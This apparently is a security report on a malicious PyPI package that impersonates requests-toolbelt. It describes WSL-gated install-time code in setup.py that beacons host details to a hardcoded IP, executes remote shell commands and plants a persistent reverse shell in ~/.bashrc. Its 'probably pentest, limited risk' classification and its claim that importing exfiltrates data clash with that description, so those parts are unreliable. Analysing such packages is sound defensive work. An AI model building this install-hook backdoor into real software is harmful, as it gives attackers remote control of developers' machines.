The package impersonates the popular requests-toolbelt library but ships an empty requests_toolbelt_plus/__init__.py and places its real logic in setup.py. On pip install, setup.py checks /proc/version for WSL markers and, when matched, opens a TCP socket to the hardcoded IP 185.184.192.205 on port 4444, sends a JSON beacon containing os.getlogin(), os.uname().nodename, and os.getcwd(), then spawns a background thread that reads JSON commands from the socket and executes them via subprocess.run(cmd, shell=True, capture_output=True, text=True), returning stdout/stderr to the operator — full remote command execution against the installer's machine. setup.py also appends a Python one-liner to ~/.bashrc that re-opens the same socket, dup2s stdio onto it, and execs /bin/bash -i, giving the attacker a persistent interactive reverse shell that fires on every new login shell and survives package uninstall. The WSL-only gating is a deliberate evasion to stay dormant on non-WSL maintainer machines and execute only on targeted Windows-Subsystem-for-Linux developer hosts.

Installing the package or importing the module exfiltrates basic information about the host, and the package has no other purpose.

---

Category: PROBABLY_PENTEST - Packages looking like typical pentest packages, but also anything that looks like testing, exploring pre-prepared kits, research & co, with clearly low-harm possibilities.

Campaign: GENERIC-standard-pypi-install-pentest

Reasons (based on the campaign):

• The package contains code to exfiltrate basic data from the system, like IP or username. It has a limited risk.

• The package overrides the install command in setup.py to execute malicious code during installation.